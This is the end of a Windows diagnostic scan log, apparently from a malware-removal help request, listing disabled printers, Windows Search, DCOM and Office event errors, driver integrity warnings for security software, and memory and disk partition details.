 

==================== Safe Mode (whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

 

==================== EXE Association (whitelisted) =============

 

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

 

 

==================== MSCONFIG/TASK MANAGER disabled items =========

 

(Currently there is no automatic fix for this section.)

 

 

==================== Faulty Device Manager Devices =============

 

Name: Microsoft 6to4 Adapter #2

Description: Microsoft 6to4 Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Microsoft

Service: tunnel

Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)

Resolution: Update the driver

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet 1022n

Description: HP LaserJet 1022n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6940 series

Description: Deskjet 6940 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: hp LaserJet 2420

Description: hp LaserJet 2420

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6980 series

Description: Deskjet 6980 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6980 series

Description: Deskjet 6980 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet P2035n

Description: HP LaserJet P2035n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet CP1025nw

Description: HP LaserJet CP1025nw

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP Color LaserJet CP2025dn

Description: HP Color LaserJet CP2025dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet P2035n

Description: HP LaserJet P2035n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet 200 color M251nw

Description: HP LaserJet 200 color M251nw

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP Color LaserJet CP2025dn

Description: HP Color LaserJet CP2025dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\INDEX> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_3> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_2> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_1> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CURRENT SESSION> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS-JOURNAL> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA-JOURNAL> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

 

System errors:

=============

Error: (08/25/2014 01:43:07 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 01:36:58 PM) (Source: VDS Dynamic Provider) (EventID: 10) (User: )

Description: The provider failed while storing notifications from the driver. The Virtual Disk Service should be restarted. hr=80042505

 

Error: (08/25/2014 01:20:43 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 01:08:55 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:58:18 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:14:03 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:04:56 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:55:18 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:45:56 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:26:20 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

 

Microsoft Office Sessions:

=========================

Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.

 

Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.

 

Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.

 

Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.

 

 

CodeIntegrity Errors:

===================================

  Date: 2014-08-25 13:41:40.016

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.905

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.794

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.682

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.419

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.308

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.196

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.070

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:27.280

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:27.171

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

 

 

==================== Memory info =========================== 

 

Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz

Percentage of memory in use: 49%

Total physical RAM: 3060.46 MB

Available physical RAM: 1540.3 MB

Total Pagefile: 6353.2 MB

Available Pagefile: 4717.66 MB

Total Virtual: 2047.88 MB

Available Virtual: 1907.04 MB

 

==================== Drives ================================

 

Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:222.38 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS

Drive f: (CC) (Removable) (Total:1.92 GB) (Free:1.88 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)

Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)

Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)

Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)

 

========================================================

Disk: 1 (Size: 1.9 GB) (Disk ID: E79A82AA)

Partition 1: (Active) - (Size=1.9 GB) - (Type=07 NTFS)

 

==================== End Of Log ============================

